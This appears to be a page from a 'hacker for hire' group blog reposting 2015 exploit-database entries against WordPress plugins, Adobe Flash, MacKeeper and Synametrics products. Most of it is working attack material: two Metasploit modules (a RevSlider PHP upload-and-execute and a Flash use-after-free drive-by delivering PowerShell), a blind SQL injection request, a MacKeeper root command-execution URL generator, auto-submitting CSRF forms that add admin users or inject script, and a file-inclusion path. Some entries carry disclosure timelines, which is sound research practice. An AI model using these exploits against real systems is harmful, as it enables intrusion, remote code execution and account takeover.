Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863532673

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage:
*http://freshmail.com/ <http://freshmail.com/> *
# Software Link:
*https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip
<https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip>*
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps

1. Summary
------------------

Freshmail plugin is an email marketing plugin for wordpress, allowing the
administrator to create mail campaigns and keep track of them.

There is a SQL Injection vulnerability available for collaborators (or
higher privileged users) for webs with freshmail plugin installed. The SQL
Injection in located in the attribute "id" of the inserted shortcode
[FM_form *id="N"*]. The shortcode attribute "id" is not sanitized before
inserting it in a SQL query.

A collaborator can insert shortcodes when he/she is editing a new post or
page and can preview the results (no administrator approval needed),
launching this SQL Injection.


2. Vulnerability timeline
----------------------------------

- 04/05/2015: Identified in version 1.5.8 and contact the developer company
by twitter.
- 05/05/2015: Send the details by mail to developer.

- 05/05/2015: Response from the developer.
- 06/05/2015: Fixed version in 1.6

3. Vulnerable code
---------------------------

Vulnerable File: include/shortcode.php, lines 27 and 120:

Line 19: function fm_form_func($atts)
[...]
Line 27: $form_value = $wpdb->get_row("select * from
".$wpdb->prefix.'fm_forms where form_id="'.$atts['id'].'";');
[...]
Line 120: add_shortcode('FM_form', 'fm_form_func');


3. Proof of concept
---------------------------

1. As collaborator, start a new post.
2. Insert the shortcode [FM_form id='1" and substr(user(),1,1)="b']
3. Click preview.
4. If the form is shown, the statement is true, if not, false.

POST /wp-admin/post.php HTTP/1.1
Host: <web>
Content-Length: 3979
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: <web>
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundary384PE6lRgBcOibkL
Referer: http://<web>/wp-admin/post.php?post=69&action=edit&message=8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_f305[...]

------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wpnonce"

0a75a3666b
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/post.php?post=69&action=edit&message=8
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="user_ID"

4
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="action"

editpost
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="originalaction"

editpost
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_author"

4
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_type"

post
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="original_post_status"

pending
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="referredby"

http://<web>/wp-admin/post.php?post=69&action=edit&message=8

------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wp_original_http_referer"

http://<web>/wp-admin/post.php?post=69&action=edit&message=8

------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_ID"

69
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="meta-box-order-nonce"

f8aa04e508
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="closedpostboxesnonce"

ebf65a43ed
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_title"

Testing SQLi in shortcode
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="samplepermalinknonce"

e753a2d8f2
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="content"

[FM_form id='1" and substr(user(),1,1)="b]
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="wp-preview"

dopreview
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="original_publish"

Submit for Review
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_format"

0
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_category[]"

0
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_category[]"

1
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="tax_input[post_tag]"


------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="newtag[post_tag]"


------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="excerpt"


------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="trackback_url"


------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metakeyselect"

#NONE#
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metakeyinput"


------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metavalue"


------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_ajax_nonce-add-meta"

6a13a5a808
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="advanced_view"

1
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="comment_status"

open
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="ping_status"

open
------WebKitFormBoundary384PE6lRgBcOibkL--


5. Solution
---------------

Update to version 1.6
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress RevSlider File Upload and Execute Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the WordPress ThemePunch
        Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The
        vulnerability allows for arbitrary file upload and remote code execution.
      },
      'Author'         =>
        [
          'Simo Ben youssef', # Vulnerability discovery
          'Tom Sellers <tom[at]fadedcode.net>'  # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'],
          ['EDB', '35385'],
          ['WPVDB', '7954'],
          ['OSVDB', '115118']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]],
      'DisclosureDate' => 'Nov 26 2015',
      'DefaultTarget'  => 0)
    )
  end

  def check
    release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt')
    check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '3.0.96')
  end

  def exploit
    php_pagename = rand_text_alpha(4 + rand(4)) + '.php'

    # Build the zip
    payload_zip = Rex::Zip::Archive.new
    # If the filename in the zip is revslider.php it will be automatically
    # executed but it will break the plugin and sometimes WordPress
    payload_zip.add_file('revslider/' + php_pagename, payload.encoded)

    # Build the POST body
    data = Rex::MIME::Message.new
    data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"')
    data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"')
    data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"revslider.zip\"")
    post_data = data.to_s

    res = send_request_cgi(
      'uri'     => wordpress_url_admin_ajax,
      'method'  => 'POST',
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    )

    if res
      if res.code == 200 && res.body =~ /Update in progress/
        # The payload itself almost never deleted, try anyway
        register_files_for_cleanup(php_pagename)
        # This normally works
        register_files_for_cleanup('../revslider.zip')
        final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename)
        print_good("#{peer} - Our payload is at: #{final_uri}")
        print_status("#{peer} - Calling payload...")
        send_request_cgi(
          'uri'     => normalize_uri(final_uri),
          'timeout' => 5
        )
      elsif res.code == 200 && res.body =~ /^0$/
        # admin-ajax.php returns 0 if the 'action' 'revslider_ajax_action' is unknown
        fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated")
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'ERROR')
    end

  end
end
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player domainMemory ByteArray Use After Free',
      'Description'         => %q{
        This module exploits a use-after-free vulnerability in Adobe Flash Player. The
        vulnerability occurs when the ByteArray assigned to the current ApplicationDomain
        is freed from an ActionScript worker, when forcing a reallocation by copying more
        contents than the original capacity, but Flash forgets to update the domainMemory
        pointer, leading to a use-after-free situation when the main worker references the
        domainMemory again. This module has been tested successfully on Windows 7 SP1
        (32-bit), IE 8 and IE11 with Flash 17.0.0.134.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'bilou', # Vulnerability discovery according to Flash Advisory
          'Unknown', # Exploit in the wild
          'hdarwin', # @hdarwin89 / public exploit (msf module is based on this one)
          'juan vazquez' # msf module
        ],
      'References'          =>
        [
          ['CVE', '2015-0359'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],
          ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html'],
          ['URL', 'http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html'],
          ['URL', 'https://git.hacklab.kr/snippets/13'],
          ['URL', 'http://pastebin.com/Wj3NViUu']
        ],
      'Payload'             =>
        {
          'DisableNops' => true
        },
      'Platform'            => 'win',
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => OperatingSystems::Match::WINDOWS_7,
          :ua_name => Msf::HttpClients::IE,
          :flash   => lambda { |ver| ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.134') },
          :arch    => ARCH_X86
        },
      'Targets'             =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'          => false,
      'DisclosureDate'      => 'Apr 14 2014',
      'DefaultTarget'       => 0))
  end

  def exploit
    @swf = create_swf
    super
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
    b64_payload = Rex::Text.encode_base64(psh_payload)

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0359', 'msf.swf')
    swf =  ::File.open(path, 'rb') { |f| swf = f.read }

    swf
  end

end
HireHackking 
#!/usr/bin/python
"""
SecureMac has released an advisory on a vulnerability discovered today with MacKeeper. The advisory titled MacKeeper URL handler remote code execution vulnerability and proof-of-concept (Zero-Day) contains the latest information including vulnerability, proof of concept and workaround solution, this report will be updated with the latest information: http://www.securemac.com/MacKeeper_Security_Advisory_Revised.php <http://www.securemac.com/MacKeeper_Security_Advisory_Revised.php>

Security Advisory:  MacKeeper URL handler remote code execution vulnerability and proof-of-concept (Zero-Day) Date issued: 05/07/2015

Risk: Critical (for users running MacKeeper)

A vulnerability has been discovered in MacKeeper, a utility program for OS X. MacKeeper was originally created by Ukrainian company ZeoBIT and is now distributed by Kromtech Alliance Corp. A flaw exists in MacKeeper's URL handler implementation that allows arbitrary remote code execution when a user visits a specially crafted webpage.

Security researcher Braden Thomas <https://twitter.com/drspringfield> has discovered a serious flaw in the way MacKeeper handles custom URLs that allows arbitrary commands to be run as root with little to no user interaction required. Mr. Thomas released a proof-of-concept (POC) demonstrating how visiting a specially crafted webpage in Safari causes the affected system to execute arbitrary commands – in this case, to uninstall MacKeeper. This flaw appears to be caused by a lack of input validation by MacKeeper when executing commands using its custom URL scheme.

If MacKeeper has already prompted the user for their password during the normal course of the program's operation, the user will not be prompted for their password prior to the arbitrary command being executed as root. If the user hasn't previously authenticated, they will be prompted to enter their username and password – however, the text that appears for the authentication dialog can be manipulated as part of the exploit and set to anything, so the user might not realize the consequences of this action. At this time it is not known if Mr. Thomas reached out to MacKeeper prior to publication of the vulnerability, but this is likely a zero-day exploit.

Apple allows OS X and iOS apps to define custom URL schemes and register them with the operating system so that other programs know which app should handle the custom URL scheme. Normally, this is used to define a custom communication protocol for sending data or performing a specific action (for example, clicking a telephone number link in iOS will ask if the user wants to dial that number, or clicking an e-mail address link in OS X will open Mail.app and compose a new message to that person). Apple's inter-application programming guide explicitly tells developers to validate the input received from these custom URLs in order to avoid problems related to URL handling. Additionally, Apple has provided information on the importance of input validation in their Secure Coding Guide <https://developer.apple.com/library/ios/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html#//apple_ref/doc/uid/TP40007246-SW5>.

Since this is a zero-day vulnerability that exists even in the latest version of MacKeeper (MacKeeper 3.4), it could affect an extremely large number of users, as a recent MacKeeper press release boasts that it has surpassed 20 million downloads worldwide <http://www.prweb.com/releases/2015/03/prweb12579604.htm>. MacKeeper is a controversial program <http://www.pcworld.com/article/2919292/apple-security-program-mackeeper-celebrates-difficult-birthday.html> in the Mac community, with many users voicing complaints about the numerous popups and advertisements they have encountered for MacKeeper. While the POC released by Mr. Thomas is relatively benign, the source code provided with the POC is in the wild and could easily be modified to perform malicious attacks on affected systems.

Workaround/Fix: Until MacKeeper fixes this vulnerability in their program, users can do a few different things to mitigate this threat. On OS X, clicking a link in Safari that uses a custom URL scheme will automatically open the program that is registered to handle that type of URL. Other browsers, such as Google's Chrome browser, will ask the user for permission before opening a link that uses an external protocol. Non-technical users could use a web browser other than Safari, in order to see an alert before a link could cause an arbitrary command to be executed. More technically-inclined users could remove the custom URL scheme handler from MacKeeper's Info.plist file.

Proof-of-concept: https://twitter.com/drspringfield/status/596316000385167361 <https://twitter.com/drspringfield/status/596316000385167361>
This is an initial advisory and will be updated at http://www.securemac.com/MacKeeper_Security_Advisory_Revised.php <http://www.securemac.com/MacKeeper_Security_Advisory_Revised.php> as more information becomes available.
"""

import sys,base64
from Foundation import *
RUN_CMD = "rm -rf /Applications/MacKeeper.app;pkill -9 -a MacKeeper"
d = NSMutableData.data()
a = NSArchiver.alloc().initForWritingWithMutableData_(d)
a.encodeValueOfObjCType_at_("@",NSString.stringWithString_("NSTask"))
a.encodeValueOfObjCType_at_("@",NSDictionary.dictionaryWithObjectsAndKeys_(NSString.stringWithString_("/bin/sh"),"LAUNCH_PATH",NSArray.arrayWithObjects_(NSString.stringWithString_("-c"),NSString.stringWithString_(RUN_CMD),None),"ARGUMENTS",NSString.stringWithString_("Your computer has malware that needs to be removed."),"PROMPT",None))
print "com-zeobit-command:///i/ZBAppController/performActionWithHelperTask:arguments:/"+base64.b64encode(d)
HireHackking 
Homepage
https://wordpress.org/plugins/yet-another-related-posts-plugin/
Affected Versions <= 4.2.4 Description 'Yet Another Related Posts Plugin'
options can be updated with no token/nonce protection which an attacker may
exploit via tricking website's administrator to enter a malformed page
which will change YARPP options, and since some options allow html the
attacker is able to inject malformed javascript code which can lead to *code
execution/administrator actions* when the injected code is triggered by an
admin user.
injected javascript code is triggered on any post page. Vulnerability Scope
XSS
RCE ( http://research.evex.pw/?vuln=14 ) Authorization Required None Proof
of Concept

<body onload="document.getElementById('payload_form').submit()" >
  <form id="payload_form"
action="http://wpsite.com/wp-admin/options-general.php?page=yarpp"
method="POST" >
    <input type='hidden' name='recent_number' value='12' >
    <input type='hidden' name='recent_units' value='month' >
    <input type='hidden' name='threshold' value='5' >
    <input type='hidden' name='weight[title]' value='no' >
    <input type='hidden' name='weight[body]' value='no' >
    <input type='hidden' name='tax[category]' value='no' >
    <input type='hidden' name='tax[post_tag]' value='consider' >
    <input type='hidden' name='auto_display_post_types[post]' value='on' >
    <input type='hidden' name='auto_display_post_types[page]' value='on' >
    <input type='hidden' name='auto_display_post_types[attachment]' value='on' >
    <input type='hidden' name='auto_display_archive' value='true' >
    <input type='hidden' name='limit' value='1' >
    <input type='hidden' name='use_template' value='builtin' >
    <input type='hidden' name='thumbnails_heading' value='Related posts:' >
    <input type='hidden' name='no_results' value='<script>alert(1);</script>' >
    <input type='hidden' name='before_related'
value='<script>alert(1);</script><li>' >
    <input type='hidden' name='after_related' value='</li>' >
    <input type='hidden' name='before_title'
value='<script>alert(1);</script><li>' >
    <input type='hidden' name='after_title' value='</li>' >
    <input type='hidden' name='show_excerpt' value='true' >
    <input type='hidden' name='excerpt_length' value='10' >
    <input type='hidden' name='before_post' value='+<small>' >
    <input type='hidden' name='after_post' value='</small>' >
    <input type='hidden' name='order' value='post_date ASC' >
    <input type='hidden' name='promote_yarpp' value='true' >
    <input type='hidden' name='rss_display' value='true' >
    <input type='hidden' name='rss_limit' value='1' >
    <input type='hidden' name='rss_use_template' value='builtin' >
    <input type='hidden' name='rss_thumbnails_heading' value='Related posts:' >
    <input type='hidden' name='rss_no_results' value='No Results' >
    <input type='hidden' name='rss_before_related' value='<li>' >
    <input type='hidden' name='rss_after_related' value='</li>' >
    <input type='hidden' name='rss_before_title' value='<li>' >
    <input type='hidden' name='rss_after_title' value='</li>' >
    <input type='hidden' name='rss_show_excerpt' value='true' >
    <input type='hidden' name='rss_excerpt_length' value='10' >
    <input type='hidden' name='rss_before_post' value='+<small>' >
    <input type='hidden' name='rss_after_post' value='</small>' >
    <input type='hidden' name='rss_order' value='score DESC' >
    <input type='hidden' name='rss_promote_yarpp' value='true' >
    <input type='hidden' name='update_yarpp' value='Save Changes' >
  </form></body>

Fix No Fix Available at The Moment. Timeline Notified Vendor - No Reply
Notified Vendor Again- No Reply
Publish Disclosure

@Evex_1337
http://research.evex.pw/?vuln=15
HireHackking 
# Exploit Title: Multiple vulnerabilities in SynTail 1.5 Build 566 (CSRF/Stored XSS)
# Date: 07-05-2015
# Exploit Author: Marlow Tannhauser
# Contact: marlowtannhauser@gmail.com
# Vendor Homepage: http://www.synametrics.com
# Software Link: http://web.synametrics.com/SynTailDownload.htm
# Version: 1.5 Build 566. Earlier versions may also be affected.
# CVE: 2015-3140
# Category: Web apps


# DISCLOSURE TIMELINE #
08/02/2015: Initial disclosure to vendor and CERT
09/02/2015: Acknowledgment of vulnerabilities from vendor
11/02/2015: Disclosure deadline of 01/03/2015 agreed with vendor
19/02/2015: Disclosure deadline renegotiated to 01/04/2015 at vendor's request
09/04/2015: Disclosure deadline renegotiated to 20/04/2015 at vendor's request
20/04/2015: Confirmation of fix from vendor
07/05/2015: Disclosure

Note that the CVE-ID is for the CSRF vulnerability only. No CVE-ID has been generated for the stored XSS vulnerabilities. The vulnerable version of the product is no longer available for download from the vendor's webpage.


# EXPLOIT DESCRIPTION #
SynTail 1.5 Build 566 is vulnerable to CSRF attacks, which can also be combined with stored XSS attacks (authenticated administrators only). The JSESSIONID created when a user logs on to the system is persistent and does not change across requests.


# POC 1 #
The following PoC uses the CSRF vulnerability to create a new file bundle, and combines it with one of the stored XSS vulnerabilities

<html>
<body>
<form name="evilform" method="post" action="http://192.168.0.8:9555/app">
<input type="hidden" name="friendlyName" value="<script>alert("Marlow")</script> />
<input type="hidden" name="selectedPath" value="/home/" />
<input type="hidden" name="showFiles" value="true" />
<input type="hidden" name="st" value="addfb" />
<input type="hidden" name="operation" value="mngFB" />
</form>
<script type="text/javascript">
document.evilform.submit();
</script>
</body>
</html> 


# POC 2 #
The following PoC uses the CSRF vulnerability to create a new user with the details shown

<html>
<body>
<form name="evilform" method="post" action="http://192.168.1.245:9555/app?operation=mngUsers">
<input type="hidden" name="fullName" value="marlow" />
<input type="hidden" name="email" value="marlow@marlow.com" />
<input type="hidden" name="password" value="marlow" />
<input type="hidden" name="showFiles" value="true" />
<input type="hidden" name="st" value="addfb" />
<input type="hidden" name="operation" value="mngUsers" />
</form>
<script type="text/javascript">
document.evilform.submit();
</script>
</body>
</html> 


# STORED XSS VULNERABILITIES #
Stored XSS vulnerabilities are present in the following fields:

Manage Users > Create a new user > Full name field and Email field
Example URL: POST request

Manage file bundles > Create a new file bundle > Friendly name field and File path field
Example URL: POST request


# MITIGATION #
Upgrade to the latest build of SynTail, available from the link shown.
HireHackking 
# Exploit Title: website contact form with file upload 1.5 Exploit Local File Inclusion
# Google Dork: inurl:"/plugins//website-contact-form-with-file-upload/"
# Date: 07.05.2015
# Exploit Author: T3N38R15
# Software Link: https://wordpress.org/plugins/website-contact-form-with-file-upload/
# Version: 1.5
# Tested on: Windows/Linux

The affected file is /wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php
it include the file /wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/helpers/demo.php
and at the line 23-26 are the inclusion.


			$file = LIB_PATH . '/filters/' . $name . '.php';
			if (!file_exists($file))
				throw new Exception("Invalid demo: {$name}");
			include($file);


The exploit can be used like that : /wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php?demo=../test
This version would include the test.php file in the same directory because we need to back navigate from the directory ./filters/../test.php
Now we can include all php files on the system.

Proof of concept : http://localhost/wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php?demo=../test

Greets to Team Madleets/leets.pro
Regards T3N38R15
HireHackking 
# Exploit Title: Multiple vulnerabilities in SynaMan 3.4 Build 1436 (CSRF/Stored XSS)
# Date: 07-05-2015
# Exploit Author: Marlow Tannhauser
# Contact: marlowtannhauser@gmail.com
# Vendor Homepage: http://www.synametrics.com
# Software Link: http://web.synametrics.com/SynaManDownload.htm
# Version: 3.4 Build 1436. Earlier versions may also be affected.
# CVE: 2015-3140
# Category: Web apps


# DISCLOSURE TIMELINE #
08/02/2015: Initial disclosure to vendor and CERT
09/02/2015: Acknowledgment of vulnerabilities from vendor
11/02/2015: Disclosure deadline of 01/03/2015 agreed with vendor
19/02/2015: Disclosure deadline renegotiated to 01/04/2015 at vendor's request
09/04/2015: Disclosure deadline renegotiated to 20/04/2015 at vendor's request
20/04/2015: Confirmation of fix from vendor
07/05/2015: Disclosure

Note that the CVE-ID is for the CSRF vulnerability only. No CVE-ID has been generated for the stored XSS vulnerabilities. The vulnerable version of the product is no longer available for download from the vendor's webpage.


# EXPLOIT DESCRIPTION #
SynaMan 3.4 Build 1436 is vulnerable to CSRF attacks, which can also be combined with stored XSS attacks (authenticated administrators only). The JSESSIONID created when a user logs on to the system is persistent and does not change across requests.


# POC 1 #
The following PoC uses the CSRF vulnerability together with one of the stored XSS vulnerabilities, to create a new shared folder in the application.

<html>
<img src="http://192.168.0.8:6060/app?sharedName=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&selectedPath=C%3A\&publicRead=1&publicWrite=1&operation=mngFolders&st=addFolder" alt="" width="1" height="1">
</html>


# POC 2 #
The following PoC uses the CSRF vulnerability to create a new user with the details shown.

<html>
<body>
<form name="evilform" method="post" action="http://192.168.1.67:6060/app?operation=mngUsers">
<input type="hidden" name="fullName" value="marlow"/>
<input type="hidden" name="login" value="marlow@marlow.com" />
<input type="hidden" name="password" value="marlow" />
<input type="hidden" name="operation" value="mngUsers" />
<input type="hidden" name="st" value="saveUser" />
<input type="hidden" name="oldLogin" value="" />
<input type="hidden" name="modifyUser" value="false" />
</form>
<script type="text/javascript">
document.evilform.submit();
</script>
</body>
</html>


# STORED XSS VULNERABILITIES # 
Stored XSS vulnerabilities are present in the following fields:

Managing Shared Folders > Shared folder name field
Example URL: http://192.168.0.8:6060/app?sharedName=%3Cscript%3Ealert%28%22Hello1%22%29%3C%2Fscript%3E&selectedPath=C%3A\&publicRead=1&publicWrite=1&operation=mngFolders&st=addFolder

Manage Users > Add a new user > User's name field and Email/Login field
Example URL: POST request

Advanced Configuration > Partial Branding > Main heading field and Sub heading field
Affects all users on all pages, pre and post authentication
Example URL: POST request

Discovery Wizard > Discovery Service Signup > One-Word name
Example URL: http://192.168.0.8:6060/app?oneword=%3Cscript%3Ealert%28%22Marlow%22%29%3C%2Fscript%3E&x=35&y=21&operation=discovery&st=checkAvailability


# MITIGATION #
Upgrade to the latest build of SynaMan, available from the link shown.
HireHackking 
# Exploit Title: Multiple vulnerabilities in Xeams 4.5 Build 5755 (CSRF/Stored XSS)
# Date: 07-05-2015
# Exploit Author: Marlow Tannhauser
# Contact: marlowtannhauser@gmail.com
# Vendor Homepage: http://www.synametrics.com
# Software Link: http://web.synametrics.com/XeamsDownload.htm
# Version: 4.5 Build 5755. Earlier versions may also be affected.
# CVE: 2015-3141 (Xeams)
# Category: Web apps


# DISCLOSURE TIMELINE #
08/02/2015: Initial disclosure to vendor and CERT
09/02/2015: Acknowledgment of vulnerabilities from vendor
11/02/2015: Disclosure deadline of 01/03/2015 agreed with vendor
19/02/2015: Disclosure deadline renegotiated to 01/04/2015 at vendor's request
09/04/2015: Disclosure deadline renegotiated to 20/04/2015 at vendor's request
20/04/2015: Confirmation of fix from vendor
07/05/2015: Disclosure

Note that the CVE-ID is for the CSRF vulnerability only. No CVE-ID has been generated for the stored XSS vulnerabilities. The vulnerable version of the product is no longer available for download from the vendor's webpage. Note also that this is a different vulnerability from CVE 2012-2569.


# EXPLOIT DESCRIPTION #
Xeams 4.5 Build 5755 is vulnerable to CSRF attacks, which can also be combined with stored XSS attacks (authenticated administrators only). The JSESSIONID created when a user logs on to the system is persistent and does not change across requests.


# POC 1 #
The following PoC uses the CSRF vulnerability to create a new SMTP domain in the application, and combines it with one of the stored XSS vulnerabilities.

<html>
<img src="http://192.168.0.8:5272/FrontController?domainname=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&operation=160" alt="" width="1" height="1">
</html>


# POC 2 #
The following PoC uses the CSRF vulnerability to create a new user with the details shown.

<html>
<img src="http://192.168.1.67:5272/FrontController?txtEmail=marlow@marlow.com&txtPwd=marlow&txtPwd1=marlow&chkActivate=on&chkNotify=on&reportTime_0=0&reportTime_1=- 1&reportTime_2=- 1&reportTime_3=- 1&reportTime_4=- 1&chkServerHost=192.168.1.67&SaveAndClose=Save&operation=504" alt="" width="1" height="1">
</html>


# STORED XSS VULNERABILITIES #
Stored XSS vulnerabilities are present in the following fields:

Server Configuration > SMTP Configuration > Domain Configuration > New domain name field
Example URL: http://192.168.0.8:5272/FrontController?domainname=%3Cscript%3Ealert%28%22ONE%22%29%3C%2Fscript%3E&operation=160#tab2

Server Configuration > Manage Forwarders > Add a new forwarder > Recipient's address
Example URL: http://192.168.0.8:5272/FrontController?txtRecipient=%3Cscript%3Ealert%28%22THREE%22%29%3C%2Fscript%3E&txtIPAddress=127.0.0.1&chkGoodOnly=on&operation=130

Server Configuration > Manage POP3 Fetcher > New Account > POP3 Server field, User Name field, and Recipient field
Example URL: http://192.168.0.8:5272/FrontController?popFetchServer=%3Cscript%3Ealert%28%22XSS1%22%29%3C%2Fscript%3E&popFetchUser=%3Cscript%3Ealert%28%22XSS2%22%29%3C%2Fscript%3E&popFetchPwd=password&popFetchRecipient=%3Cscript%3Ealert%28%22XSS3%22%29%3C%2Fscript%3E&popFetchCount=0&operation=73&index=-1

Server Configuration > Server Configuration > Advanced Configuration > Smtp HELO domain [XSS is displayed in Tools > About Xeams]
Example URL: POST request


# MITIGATION #
Upgrade to the latest build of Xeams, available from the link shown.
HireHackking 
source: https://www.securityfocus.com/bid/52425/info
  
Wikidforum is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
  
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  
